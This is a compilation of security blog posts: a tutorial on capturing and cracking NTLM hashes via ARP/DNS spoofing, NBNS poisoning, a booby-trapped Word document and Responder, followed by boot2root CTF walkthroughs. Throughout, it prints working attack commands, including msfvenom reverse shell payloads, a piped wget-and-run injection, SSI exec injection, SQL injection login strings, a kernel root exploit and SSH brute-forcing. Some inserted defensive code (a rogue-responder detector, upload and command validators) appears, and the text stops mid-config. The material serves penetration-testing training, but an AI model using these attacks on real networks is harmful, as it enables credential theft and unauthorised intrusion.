In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default network authentication protocol from Windows NT 4.0 and provides authentication, integrity and confidentiality to users. NTLMv2 is the latest version; it is a challenge-response protocol keyed with the NT hash, an unsalted MD4 of the UTF-16 password. The NT hash is 128 bits long and is used for both local and domain accounts.

Two things that both get called "NTLM hash" must be kept apart. The NT hash stored on the server (or domain controller) is password-equivalent because it is unsalted: grab it from the SAM or from NTDS and you can authenticate without knowing the actual password. What the four methods below capture on the wire is different: a NetNTLMv2 challenge-response, an HMAC-MD5 over a challenge the attacker chose, keyed with a value derived from the NT hash. That response cannot be replayed as a pass-the-hash, but because the attacker knows the challenge it can be cracked offline against a wordlist, or relayed to another host while the session is live.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through sniffing

On the attacker machine open the etter.dns file in /etc/ettercap on Kali Linux, replace its whole content with the line below (which resolves every name to the attacker's IP) and save it.

* A 192.168.1.103

Now follow the steps below to run ettercap and start sniffing.

  • Applications > Sniffing & Spoofing > ettercap
  • Click Sniff and select your network interface.
  • Scan for hosts to generate the target list.

Select the host and add it as a target; in the image you can see that of the 5 hosts I chose 192.168.1.101 and added it to Target 1.

Click MITM in the menu bar and select ARP poisoning; a dialog box pops up, enable "Sniff remote connections" and click OK.

Then click Plugins in the menu bar and choose dns_spoof.

With dns_spoof the attacker redirects the victim's web traffic to the attacker's IP, so that whatever site the victim opens in the browser is answered by the attacker's machine.

Now load the Metasploit framework and run the following to use the http_ntlm module.

This module attempts to quietly catch NTLM/LM challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

With the trap set as above, this module captures the victim's NetNTLMv2 response as soon as he opens any HTTP website in his browser: the spoofed DNS sends the request to the attacker's IP and the module answers it with a 401 demanding NTLM authentication.

In the image below you can see the victim trying to browse "hackingarticles.in", but the site asks him to authenticate with a username and password. If he tries something else, say google.com, it asks for a username and password there too; until he submits his credentials he cannot browse anything.

As soon as the victim enters his username and password, the attacker captures the NetNTLMv2 response in the background.

Great!! The attacker has captured the NetNTLMv2 hash. Besides the hash value itself the attacker has captured two more details:

Username: pentest

Machine name: Desktop-UKIQM20

Now use John the Ripper to crack the NetNTLMv2 hash. The module wrote it to the JOHNPWFILE path with the suffix _netntlmv2 appended, so here the file is /root/Desktop/_netntlmv2:

john _netntlmv2

In the image below you can confirm that we recovered the password 123 for user pentest by cracking the NetNTLMv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service use by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing easy cracking with Cain & Abel, L0phtCrack or John the Ripper (with the jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run the nbns_response module alongside the SMB capture module.

This module forges NetBIOS Name Service (NBNS) responses. It listens for NBNS requests sent to the local subnet's broadcast address and spoofs a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and binds to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) > exploit

As a result, when the victim tries to reach a share by a name that DNS cannot resolve, Windows falls back to an NBNS broadcast, the attacker answers it, and the victim's system shows a Windows Security prompt for the attacker's fake server.

We used nmap UDP and TCP port scans to identify open ports and protocols, and in the image you can see port 137 is open for the NetBIOS name service.

Now when the victim tries to access a shared folder he connects to the attacker's IP; the image below shows the victim connecting to 192.168.1.103.

When the victim tries to access the share he is caught by the fake Windows Security prompt, which asks for his username and password.

Awesome!! Once again the attacker has captured the NetNTLMv2 hash, and again two more details along with it:

Username: pentest

Machine name: Desktop-UKIQM20

Again use John the Ripper to crack the NetNTLMv2 hash; with JOHNPWFILE set to /tmp/john_smb the file is /tmp/john_smb_netntlmv2:

john /tmp/john_smb_netntlmv2

In the image below you can confirm that we recovered the password 123 for user pentest by cracking the NetNTLMv2 hash.

Capture NTLMv2 hash through capture SMB & Word UNC injector

This module modifies a .docx file so that, upon opening, it submits the stored NetNTLM credentials to a remote host. It can also create an empty .docx file. If emailed, the receiver needs to put the document in editing mode before the remote server is contacted; Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010 and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) > set lhost 192.168.1.103

msf auxiliary(word_unc_injector) > exploit

It creates an empty docx file under /root/.msf4/local/

Now send this msf.docx file to the victim and again run the capture/smb module in the Metasploit framework as before.

In the image below you can see that the auxiliary/server/capture/smb module is used to receive the hashes.

As soon as the victim opens msf.docx, Word follows the embedded UNC path to the attacker's SMB server and the attacker captures the NetNTLMv2 hash. The difference from the two attacks above is that here no prompt is shown: Windows authenticates to the SMB server with the logged-on user's credentials automatically, so the NetNTLMv2 hash is all that is captured and no interaction by the victim beyond opening the file is needed.

Again use John the Ripper to crack the NetNTLMv2 hash:

john _netntlmv2

In the image below you can confirm that we recovered the password 123 for user pentest by cracking the NetNTLMv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it is downloaded, execute the following command to run the Python script:

python Responder.py -i 192.168.1.103 -I eth0

From the image you can see that all poisoners and server services are turned on.

Now the victim again tries to access the shared folder and is steered to the attacker's network IP; the image below shows the victim connecting to the attacker's IP, 192.168.1.103.

When the victim tries to access the shared folder, he is trapped by a fake network error alert prompt, as shown in the image below.

Once again the attacker has captured the NTLMv2 hash; from the image you can see that here too the attacker has captured two more things:

Username: pentest

Machine name: Desktop-UKIQM20

The captured NTLM hash is stored in a text file under /root/Desktop/Responder/logs.

Again use John the Ripper to crack the NTLMv2 hash by executing the command below:

john _netntlmv2

From the image below you can confirm that we successfully retrieved the password 123 for the user pentest by cracking the NTLMv2 hash.
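An added example (not Responder's code and not from the article): because Responder answers LLMNR queries for names that do not exist, a defender can detect it by asking for a random non-existent name and listening for any answer. The multicast group, port and packet layout follow RFC 4795; the sample response used for the offline check is constructed.

```python
"""Added example (not part of Responder or this article): detect a rogue
LLMNR responder by querying for a name that cannot exist. A healthy
segment never answers such a query; Responder, which answers every LLMNR
name it sees, does. The builder and parser are pure functions so the wire
format can be checked offline; probe_for_rogue_responder() does the real
multicast send on UDP 5355."""
import random
import socket
import struct
from typing import List, Tuple

LLMNR_GROUP = "224.0.0.252"  # IPv4 LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355

def encode_name(name: str) -> bytes:
    """DNS-style encoding: length-prefixed labels, zero terminator."""
    labels = [lab.encode("ascii") for lab in name.strip(".").split(".")]
    return b"".join(bytes([len(lab)]) + lab for lab in labels) + b"\x00"

def build_llmnr_query(name: str, txid: int) -> bytes:
    """12-byte DNS header (id, flags=0, QDCOUNT=1) + one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)

def _read_name(data: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels: List[str] = []
    end = None  # set at the first compression pointer; caller resumes there
    while True:
        ln = data[off]
        if (ln & 0xC0) == 0xC0:
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(data[off:off + ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels), (end if end is not None else off)

def parse_llmnr_response(data: bytes, expected_txid: int) -> List[Tuple[str, str]]:
    """Return [(name, ipv4)] from A records in a response that matches our
    transaction id and has the QR bit set; anything else is ignored."""
    if len(data) < 12:
        return []
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not (flags & 0x8000):
        return []
    off = 12
    for _ in range(qdcount):  # skip the echoed question section
        _, off = _read_name(data, off)
        off += 4
    answers = []
    for _ in range(ancount):
        name, off = _read_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return answers

def sample_poisoned_response(txid: int, name: str, ip: str) -> bytes:
    """Constructed test vector shaped like a poisoner's answer: QR bit set,
    question echoed, one A record whose name is a pointer to the question."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(ip)
    return header + question + answer

def probe_for_rogue_responder(timeout: float = 2.0) -> List[Tuple[str, str, str]]:
    """Query a random non-existent name; any (responder_ip, name, claimed_ip)
    returned means something on the segment answers names it does not own."""
    name = "nx-probe-%08x" % random.getrandbits(32)
    txid = random.randrange(1, 0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    findings = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(2048)
            for qname, ip in parse_llmnr_response(data, txid):
                findings.append((src, qname, ip))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return findings

if __name__ == "__main__":
    print(probe_for_rogue_responder() or "no LLMNR responder answered the bogus name")
```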

Wonderful! These were four ways to trap the target user in order to capture the NTLM hash.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

The post 4 Ways to Capture NTLM Hashes in Network appeared first on Hacking Articles.

Hack the Lazysysadmin VM (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as Lazysysadmin. The credit for making this vm machine goes to “Togie Mcdogie” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.124, but you will have to find your own):

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.124

We find that ports 139 and 445 are open, so we use smbclient to list the shared disks.

smbclient -L 192.168.1.124

After finding the shared drive we use smbclient to access the shared folder.

smbclient '//192.168.1.124/share$'

Searching through the files we find a wordpress folder. From it we download the wp-config.php file to look for the username and password.

In the wp-config.php file we find the username and password for wordpress login.

Now we use dirb to find the wordpress page, as the default page on the server is not based on wordpress.

dirb http://192.168.1.124

Now after finding the wordpress page we open admin login page. We access the admin dashboard using the username and password we found earlier in the wp-config.php file.

We then create a php payload using msfvenom and replace the 404.php page in themes with the code of our payload.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw

We set up our listener using Metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.109

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > run

We then call the 404.php page to start our session. The 404.php page can be found in /wp-content/themes/twentyfifteen/404.php

As soon as our payload is executed we get our reverse shell.

After searching through the files, we don't find anything useful. So we go back to the shared folder and download a file called deets.txt.

When we open the file we find a password for some user.

We open the /etc/passwd file on the VM to find the name of the users.

When we try to switch users we get an error message asking for a terminal, so we spawn /bin/bash using Python.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

Then we switch to the user togie with the password found in the deets.txt file.

su - togie

We then check the sudoers entries and find that we have all the privileges of the root user, so we switch to root.

sudo -l

sudo su

After switching to root we go into the root folder. There we find a file called proof.txt; we open it and are greeted with a message congratulating us on the completion of the CTF challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the Lazysysadmin VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Bulldog VM (Boot2Root Challenge)


Hello friends! Today we are going to take another CTF challenge known as Bulldog. The credit for making this vm machine goes to “Nick Frichette” and it is another Boot2root challenge. Our goal is to get into root directory and see the congratulatory message. You can download this VM here.

Let’s Breach!!!

The target has the network IP 192.168.1.158; now let's use nmap to find the open ports.

nmap -sV 192.168.1.158

The nmap scan shows us that port 80 is open, so we open the IP address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.158/

We find quite a few directories and open http://192.168.1.158/dev/ for information. There is nothing on the web page itself, so we look at the page source, where we find a few MD5 password hashes for the respective users.

We are able to crack only the last two hashes, which give the strings 'bulldog' and 'bulldoglover'.

We open the admin page we found using dirb and use one of the cracked strings as the password together with its respective username.

We use username as ‘nick’ and password as ‘bulldog’.

After logging in we go to http://192.168.1.158/dev/shell, which we found using dirb. It is a web command shell that allows only certain commands to be executed. We can easily bypass this filter using '|' to chain multiple commands.
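As an added example (not the Bulldog VM's code), the filter pattern just described, a check on the first word followed by execution in a shell, next to an allowlisting parser that tokenises without a shell; the allowed program set is an assumption for the demo.

```python
"""Added example, not the Bulldog VM's own code: why a web "shell" that
checks only the first word of a command is bypassed with a pipe, and the
allowlisting that closes the hole. The hardened path never hands the
string to a shell, so metacharacters are never interpreted."""
import re
import shlex
import subprocess
from typing import List, Optional

ALLOWED_PROGRAMS = {"pwd", "ls", "whoami", "uname", "ifconfig"}  # demo assumption
# arguments may contain only path-like characters: no | ; & $ ` ( ) < > quotes or spaces
SAFE_ARGUMENT = re.compile(r"[A-Za-z0-9_./-]+")


def vulnerable_check(command: str) -> bool:
    """First-word filter: accepts the line if its first word is allowed.
    The line is then executed with shell=True, so
    'pwd | wget http://.../shell.py | python shell.py' passes the check and
    the shell runs the other two commands as well."""
    words = command.split()
    return bool(words) and words[0] in ALLOWED_PROGRAMS


def hardened_parse(command: str) -> Optional[List[str]]:
    """Tokenise without a shell, allowlist the program, and restrict every
    argument to a safe character class. Returns argv, or None when denied."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    if any(not SAFE_ARGUMENT.fullmatch(arg) for arg in argv[1:]):
        return None
    return argv


def run_hardened(command: str) -> str:
    """Execute only what hardened_parse() accepted, as an argv list (no
    shell), so '|' and ';' stay literal even if the allowlist grows."""
    argv = hardened_parse(command)
    if argv is None:
        raise PermissionError("command rejected: %r" % command)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return result.stdout


if __name__ == "__main__":
    chained = "pwd | wget http://192.168.1.111/shell.py | python shell.py"
    print("first-word filter accepts chained command:", vulnerable_check(chained))
    print("hardened parser result:", hardened_parse(chained))
    print("hardened output for 'uname -a':", run_hardened("uname -a").strip())
```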

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 > /var/www/html/shell.py

We set up our listener in Metasploit for the reverse shell.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.1.111

msf exploit(handler) > set lport 4444

msf exploit(handler) > set payload python/meterpreter/reverse_tcp

msf exploit(handler) > run

We now fetch our payload onto the server and execute it to get the reverse shell.

pwd | wget http://192.168.1.111/shell.py | python shell.py

As soon as we execute our payload we get our session on metasploit.

We spawn a TTY shell using Python to execute our commands.

python -c 'import pty; pty.spawn("/bin/bash")'

Looking through we find a file customPermissionApp in /home/bulldogadmin/.hiddendirectory/.

We use strings command to take a look at the strings inside customPermissionApp.

strings customPermissionApp

We find the string SUPERultHimatePASHSWORDyouHCANTget; removing every 'H' from it gives the password that grants us root access.

sudo su

Then we move to the root folder, where we find a file called 'congrats.txt'. When we open the file we are greeted by a message congratulating us on the completion of the VM challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the Bulldog VM (Boot2Root Challenge) appeared first on Hacking Articles.


Hack the BTRSys: v2.1 VM (Boot2Root Challenge)


BTRSys is a boot2root challenge developed by 'ismailonderkaya' in the BTRSys series. It is an excellent practice lab that covers a wide range of techniques.

Difficulty level: Intermediate

WalkThrough

Let's start by finding our target with the following command:

netdiscover

Now that we know our target is 192.168.0.106, we run nmap against it to learn which ports and services are open. Use the following command:

nmap -A 192.168.0.106

From the nmap output you can see that ports 21, 22 and 80 are open, running FTP, SSH and HTTP respectively. As we still have a lot to discover, we use DIRB next. Dirb is a web content scanner: it brute-forces the web application for files and directories, including hidden ones. Use the following command:

dirb http://192.168.0.106

As you can see in the above image, dirb found various files and directories such as robots.txt and upload. It also shows that the target web application runs WordPress, so we can apply a WordPress scan that enumerates themes, plugins and users with the following command:

./wpscan.rb -u http://192.168.0.106/wordpress/ --enumerate at --enumerate ap --enumerate u

As a result we find two users: btrisk and admin.

Logging in as admin with the password admin gives access to the dashboard. Once you have that access you can place malicious PHP code there to obtain a meterpreter session. Generate it with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command outputs PHP code. Copy the code from <?php to die(); and paste it into the theme template as shown below:

Once the code is uploaded, execute it through URL as shown :

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before requesting the above URL, make sure that your meterpreter handler is active. To do so, go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

Once the handler is active and the URL has been requested, you will have your session. Let's check the information of the system we have entered by typing:

sysinfo

Now let’s get into shell by simply typing:

shell

Through the shell we learn that the Ubuntu version is 16.04.2 and, fortunately, there is an exploit on exploit-db for this version of Ubuntu. Download this exploit.

This exploit achieves privilege escalation so that you can get root directly. Once the exploit is downloaded, compile it by typing:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it to the /tmp directory. Change to /tmp first, then upload. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now drop to a shell, change to /tmp, make the rootshell exploit executable and then run it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are root, and so our Boot2Root challenge is complete.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

 

The post Hack the BTRSys: v2.1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

Hack the BTRSys1 VM (Boot2Root Challenge)


BTRSys v1 is another lab by ‘ismailonderkaya’ in the series BTRSys. This lab helps you sharpen your skills as a pentester. It is a must lab for a beginner.

Difficulty level: Beginner

WalkThrough

Let’s start with finding our target as always by using the following command:

netdiscover

Now that we know our target is 192.168.0.105, let's use nmap on it. Nmap has many types of scans, but the aggressive scan (-A) is convenient as it combines several of them and gives all the information at once.

nmap -A 192.168.0.105

Through nmap we know that ports 21, 22 and 80 are open, running FTP, SSH and HTTP respectively. As nmap hasn't told us much, we dig deeper with nikto. Nikto is an open-source web server scanner that looks for dangerous files/programs, outdated versions, index files, HTTP server options, etc. To use nikto, type:

nikto -h http://192.168.0.105

With the help of nikto we learn that there is a login page at /login.php

Let's go to the login page by typing the following in the URL bar:

192.168.0.105/login.php

So now we are on the login page, but we do not have credentials to log in. Let's check its page source.

If you look carefully at the control function in the page source, you'll realise that the username must end with @btrisk.com. We can therefore try SQL injection here, using the following steps:

Brute-force the login with SQL injection payloads. (When asked for the text file for the brute force, select the one containing the list of SQL injection strings.)

After the brute force completes it shows the SQL injection string that lets you log in, as shown in the above image.

 

Right-click on that request and select 'Show response in browser' as shown above. This opens the browser, where you will find yourself automatically logged in.

Login details: @btrisk.com   ' or ''='

Once logged in, there is an option to upload a file. Here we can upload our malicious PHP code. To generate the code, open a terminal in Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

Copy the code from <?php to die(); and save it in a .txt file. After saving, change the extension from .txt to .php and then upload it.

When you try to upload the .php file it tells you that only jpg and png files can be uploaded. Okay! So change the extension from .php to .jpg and upload it again, but this time capture the request in Burp Suite.

Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.
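An added example, not BTRSys1's upload handler: the check above could be beaten because the server trusted the extension sent in the request. The validation below also inspects the file's leading bytes and the dotted segments of the name, and stores the file under a generated name; the signatures, extension lists and sample uploads are the example's own assumptions.

```python
"""Added example (not BTRSys1's code): server-side upload validation that
is not fooled by renaming .php to .jpg in the request. The extension, any
extra dotted segments, and the file's leading bytes must all agree that it
is an image; the stored name is generated, and the upload directory is
expected to be served without script execution."""
import os
import uuid
from typing import Tuple

# extension -> magic bytes a genuine file of that type must start with
IMAGE_SIGNATURES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
}
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py", "sh"}
PHP_MARKERS = (b"<?php", b"<?=")


def validate_image_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Every check is on what the server sees,
    never on what the client claims."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) < 2:
        return False, "no extension"
    ext = parts[-1]
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not allowed"            # shell.php
    if any(seg in SERVER_EXECUTABLE for seg in parts[1:-1]):
        return False, "executable double extension"      # shell.php.jpg
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, "content does not match extension" # PHP saved as .jpg
    if any(marker in data for marker in PHP_MARKERS):
        return False, "embedded PHP"                     # JPEG/PHP polyglot
    return True, "ok"


def safe_stored_name(ext: str) -> str:
    """Never reuse the client's filename: a random name cannot be guessed
    as /uploads/shell.php and cannot smuggle a second extension."""
    return "%s.%s" % (uuid.uuid4().hex, ext.lower())


if __name__ == "__main__":
    samples = {                          # constructed inputs, not real uploads
        "shell.php":     b"<?php /* constructed */ ?>",
        "shell.jpg":     b"<?php /* constructed */ ?>",
        "shell.php.jpg": b"\xff\xd8\xff\xe0JFIF",
        "photo.jpg":     b"\xff\xd8\xff\xe0JFIF\x00\x01",
        "poly.jpg":      b"\xff\xd8\xff\xe0<?php /* constructed */ ?>",
    }
    for name, body in samples.items():
        print("%-14s -> %s" % (name, validate_image_upload(name, body)))
```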

Our malicious file is uploaded, but we still have to find the directory it was uploaded to so we can execute it and get our session. For that we use DIRB; type:

dirb http://192.168.0.105

Dirb shows a directory named uploads, which is obviously where our file went. To execute the file, type the following in the URL bar:

192.168.0.105/uploads/shell.php

As always, before executing the file remember to start your handler in Metasploit so that you receive the session. Open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

After the handler is started and your file is executed, you will have your meterpreter session. Let's check the system information by typing:

sysinfo

Now that we have a meterpreter session, let's explore a bit and look into the web root:

cd /var/www/html

ls

There is a config.php file in /var/www/html. This file often proves important, so let's check it out.

cat config.php

Through config.php we obtain the following three values, which include a database username and password:

root

toor

deneme

Let's now drop to a shell and log in to MySQL with these values:

shell

mysql -uroot -p -Ddeneme

Then enter the password toor.

Once logged in, let's list the tables with the following command:

show tables;

As shown in the above image there is a table named user. Let's see what this table holds:

select * from user;

From the table we learn that the password for root is asd123***. Let's log in with it:

su root

asd123***

Let's confirm our root access:

whoami

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Hack the BTRSys1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

Hack the RickdiculouslyEasy VM (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as RickdiculouslyEasy. The credit for making this VM goes to "Luke" and it is another capture-the-flag challenge. Our goal is to capture flags worth 130 points in total to complete the challenge. You can download this VM here.

Let’s Breach!!!

The target has the network IP 192.168.1.107; now let's use nmap to find the open ports.

nmap -p- -A 192.168.1.107

The nmap scan shows that ports 21, 80, 9090, 13337, 22222 and 60000 are open. It also shows that anonymous login is allowed on FTP.

We enumerate the open ports further using netcat and find two flags.

nc 192.168.1.107 13337

nc 192.168.1.107 60000

We open port 9090 in a web browser and find the third flag.

As port 80 is open, we use dirb to list the directories.

dirb http://192.168.1.107/

Using dirb we find a page, http://192.168.1.107/passwords/. When we open it we find two files, 'FLAG.txt' and 'passwords.html'.

When we open the 'FLAG.txt' file we get our 4th flag.

Now we open the passwords.html file. There is nothing visible on the page, so we look at its source code, where we find a password for some user.

The nmap scan showed that FTP allows anonymous login, so we log in to FTP with anonymous as both username and password.

On the FTP server we find a file called FLAG.txt; we open it and find our 5th flag.

We open robots.txt and find links to two files, root_shell.cgi and tracertool.cgi.

http://192.168.1.107/cgi-bin/tracertool.cgi is vulnerable to command injection.

We find that a few commands are filtered, so we use the 'more' command to get the names of the users from the /etc/passwd file.

more /etc/passwd

Now we log in over SSH using the username Summer and the password winter that we found earlier.

ssh -p 22222 Summer@192.168.1.107

After connecting over SSH we find a file called FLAG.txt, and inside it our 6th flag.

Searching through the files we come across an image and a zip file inside the Morty/ directory. We copy the files to our own system with scp over SSH.

scp Safe_Password.jpg root@192.168.1.111:/root/Desktop

scp journal.txt.zip root@192.168.1.111:/root/Desktop

After downloading the files we use the strings command to check whether something is hidden inside the image file, and we find the password for unzipping journal.txt.zip.

strings Safe_Password.jpg

After unzipping the zip file, we open the file and find our 7th flag.

Back on the target VM we find an executable file called 'safe'. We try to run it but do not have permission, so we copy it to our own system.

scp safe root@192.168.1.111:/root/Desktop

When we run the file it asks for an argument. We use the string found inside the last flag (131333) and get a hint about the password for the user RickSanchez.

The hint says the password consists of one uppercase character and one digit followed by one of the words in the name of Rick Sanchez's band, which we find was called 'The Flesh Curtains'. We use crunch to create a dictionary.

crunch 10 10 -t ,%Curtains -o /root/Desktop/pass.txt

crunch 7 7 -t ,%Flesh -o /root/Desktop/pass1.txt

After creating the two dictionaries, we use the dymerge tool to combine them into a single one.

python dymerge.py /root/Desktop/pass.txt /root/Desktop/pass1.txt -s -o /root/Desktop/password.txt

Now that our dictionary is ready, we brute-force SSH using Metasploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.107

msf auxiliary(ssh_login) > set rport 22222

msf auxiliary(ssh_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(ssh_login) > set username RickSanchez

msf auxiliary(ssh_login) > run

After successfully brute-forcing SSH, we spawn a TTY shell using Python.

python -c 'import pty; pty.spawn("/bin/bash")'

After spawning the shell, we check the sudoers entries and find that we have all the privileges of root.

We switch to the root user and move to the root folder. Inside it we find a file called FLAG.txt; when we open it we find our final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the RickdiculouslyEasy VM (CTF Challenge) appeared first on Hacking Articles.

Hack the H.A.S.T.E. VM Challenge


Hello friends! Today we are going to take another CTF challenge known as 'H.A.S.T.E.'. The credit for making this VM goes to "f1re_w1re", and it is a unique challenge in that we only have to get a reverse shell to complete it. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.0.102, but you will have to find your own):

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.102

We find that port 80 is open, so we open the IP address in our browser.

We don't find anything on the page, so we use dirb to list directories on the web server.

dirb http://192.168.0.102

When we open http://192.168.0.102/ssi we get a hint that the website may be vulnerable to server-side include (SSI) injection.

When we open http://192.168.0.102/index we find the code executed by the server.

Now we go back to http://192.168.0.102/ and use SSI injection to execute our commands.

We execute the 'ls -la' command to check that it works; as you can see in the image below, our command ran successfully.

<!--#exec cmd="ls -la" -->

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.py

Now we make the server fetch our shell using SSI injection.

<!--#exec cmd="wget http://192.168.0.107/shell.py" -->

After the shell has been fetched successfully, we use SSI injection to execute our payload.

<!--#exec cmd="python shell.py" -->
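An added example, not the VM's configuration: the Apache mod_include settings that make an injected #exec directive possible, next to the IncludesNOEXEC form that refuses it. The directory path is assumed; mod_include must be enabled in both cases.

```apache
# Weak: Options +Includes lets mod_include honour every SSI directive,
# including <!--#exec cmd="..." -->, in any file the INCLUDES filter touches.
<Directory "/var/www/html">
    Options +Includes
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>

# Hardened: IncludesNOEXEC keeps static includes working but refuses
# "#exec cmd" and "#exec cgi"; a smuggled directive is logged and replaced
# by SSIErrorMsg instead of being run. Reflected input must still never be
# written into an SSI-processed file, since other directives (#include)
# remain available.
<Directory "/var/www/html">
    Options +IncludesNOEXEC
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
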